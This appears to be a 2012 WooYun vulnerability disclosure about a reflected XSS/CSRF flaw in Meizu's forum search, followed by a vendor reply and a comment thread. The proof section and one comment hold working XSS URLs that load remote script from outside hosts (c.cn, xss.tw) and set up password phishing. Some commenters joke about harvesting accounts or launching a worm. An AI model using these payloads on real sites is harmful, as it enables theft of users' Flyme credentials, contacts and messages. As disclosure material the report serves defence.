魅族论坛存在CSRF漏洞

漏洞概要

缺陷编号:WooYun-2012-016117

漏洞标题:魅族论坛存在CSRF漏洞

相关厂商:魅族科技

漏洞作者:Clar

提交时间:2012-12-17 00:48

公开时间:2013-01-31 00:49

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-12-17: 细节已通知厂商并且等待厂商处理中
2012-12-18: 厂商已经确认,细节仅向厂商公开
2012-12-28: 细节向核心白帽子及相关领域专家公开
2013-01-07: 细节向普通白帽子公开
2013-01-17: 细节向实习白帽子公开
2013-01-31: 细节向公众公开

简要描述:

魅族论坛存在CSRF漏洞,如操作适当可取得用户的flyme帐号密码,通过flyme帐号密码可查看通讯录短信帐户余额等信息。

详细说明:

背景:魅族的手机本身有flyme远程账户,用于存储通讯录、短信等私密信息。核心:论坛改版后可使用flyme帐号密码登录论坛.自评:个人给予漏洞等级:高。原因在于用户的通讯录以及私密短信泄漏,并且可操作flyme帐户金额、远程锁定手机等功能。还有很多操作可以执行例如修改CSS样式等操作。不一一列举了。

漏洞证明:

背景:魅族的手机本身有flyme远程账户,用于存储通讯录、短信等私密信息。核心:论坛改版后可使用flyme帐号密码登录论坛.自评:个人给予漏洞等级:高。原因在于用户的通讯录以及私密短信泄漏,并且可操作flyme帐户金额、远程锁定手机等功能。注意:下方提供的连接中使用的c.cn仅为本机host域名 重现请自己修改JS调用域名等信息图一为IE下的远程JS调用,可直接操控页面

连接:http://bbs.meizu.cn/search.php?srchtxt=%22;%3C/script%3E%3CSCRIPT/XSS%20SRC=http://c.cn/1.js%3E%3C/SCRIPT%3E&srcreply=0&srchtype=title&orderby=dateline&ascdesc=desc&searchsubmit=1&searchtype=search_subject图二为chrome或其他浏览器实现帐号密码欺骗

连接:http://bbs.meizu.cn/search.php?srchtxt=%3C/script%3E%3Ca%20href=http://c.cn%3E%3Cimg%20src=http://c.cn/1.png%3E%3C/a%3E%3C!--&srcreply=0&srchtype=title&orderby=dateline&ascdesc=desc&searchsubmit=1&searchtype=search_subject还有很多操作可以执行例如修改CSS样式等操作。不一一列举了。@xsser 说要补充证明,于是就有了下面的图片:

修复方案:

CSRF我相信魅族能修复的。

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2012-12-18 16:04

厂商回复:

该漏洞我方正在紧急处理,谢谢关注!

最新状态:

暂无

评价

  1. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    ....我的账户。。。。

  2. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @疯子 我也是煤油。。。。

  3. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    @Clar 所以说啊,别瞎搞,我昨天还用魅族盲打了一个腾讯的应用。

  4. 2010-01-01 00:00 Finger 白帽子 | Rank:748 漏洞数:95)

    话说魅族对漏洞处理的反应太慢 态度也不是很好 貌似没专人去处理漏洞的问题 给魅族报过两个漏洞 修复了一个 处理反馈的都不是很及时 貌似对漏洞的危害上认知不够 flyme云端可是涉及到用户通讯录、短信等隐私的啊!!! 还有flyme账号与论坛账号统一了 这也是一个很大的安全隐患

  5. 2010-01-01 00:00 Finger 白帽子 | Rank:748 漏洞数:95)

    我也是一魅族用户,所以希望魅族能做好用户数据不泄露的安全工作 尤其是对待用户数据安全的态度上 至于用户数据不丢失 貌似是手机云服务最基本的 这个就不用说了吧

  6. 2010-01-01 00:00 cnrstar 白帽子 | Rank:136 漏洞数:18)

    @Finger 就是考虑到这个问题才不敢用的原因,我觉得魅族的安全做的肯定不如苹果,被脱库的概率很大,一旦被脱库,My God,损失大了。。

  7. 2010-01-01 00:00 Finger 白帽子 | Rank:748 漏洞数:95)

    @cnrstar 那就不用云服务

  8. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @疯子 汗 我没瞎搞呀,我这不是提交给乌云了嘛。。。

  9. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @Finger 要是魅族不重视的话 到时候 我就去论坛发帖,钓到一大把账号密码来,然后拿到通讯录。将名称什么的 都屏蔽掉再晒在论坛里去。我敢肯定没有会非常生气的。

  10. 2010-01-01 00:00 Finger 白帽子 | Rank:748 漏洞数:95)

    @Clar 马上给你删帖!

  11. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    @Finger 是的..确实,他们不是很注重安全,也不理解白帽子的心情。

  12. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @Finger 汗 手机论坛这么多。。。 我想MZ不会做的太傻的。

  13. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    @Clar 你去看看魅族的开发者社区会有惊喜。。

  14. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @疯子 没看到惊喜呀!你确定是开发者社区?

  15. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @Finger 鄙视不分享漏洞详情

  16. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @xsser 看站内信?

  17. 2010-01-01 00:00 凤凰 白帽子 | Rank:15 漏洞数:5)

    第二天回复,还算不错,毕竟魅族原先是手机厂商,从flyme才开始进入互联网,不能求全责备

  18. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @凤凰 嗯,更关注就好

  19. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    这个应该是xss啊 img和iframe都是引用标签导致站外内容,都是因为过滤不严

  20. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @小胖胖要减肥 他们根本不在意这样的漏洞,比如说2013年前站内信的他们都不去理会:http://developer.meizu.com/faq/faq_toquiz.jsp?keyWord=/'%3E%3C/script%3E%3Ca%20href=http://www.baidu.com%3E%3Cimg%20src=http://store.meizu.com/images/booking_new.png%3E%3C/a%3E%3Csvg%3E%3Cscript%20xlink:href=//xss.tw/1114%3E%3C/script%3E%3C!--

  21. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    @Clar 蠕虫蠕起来吧 骚年

  22. 2010-01-01 00:00 Clar 白帽子 Rank:5 漏洞数:2)

    @小胖胖要减肥 .....等有机会了 我会这么干的O.O)

  23. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @Clar 后面有个漏洞直接把人家的手机信息给窃取了

  24. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @xsser 你说的是那个订单的那个吗?

  25. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @小胖胖要减肥 @xsser 话说小米也有偷COOKIE的CSRF漏洞 -_-!!! 毕竟他是PHPCMS的系统

  26. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @Clar 订单那个还没人发 你来吧

  27. 2010-01-01 00:00 Clar 白帽子 | Rank:5 漏洞数:2)

    @xsser -_-!! 我以为你说的是那个乌云那谁发的扫手机号码订单的

  28. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    @Clar 多多发洞 安全环境才能越来越好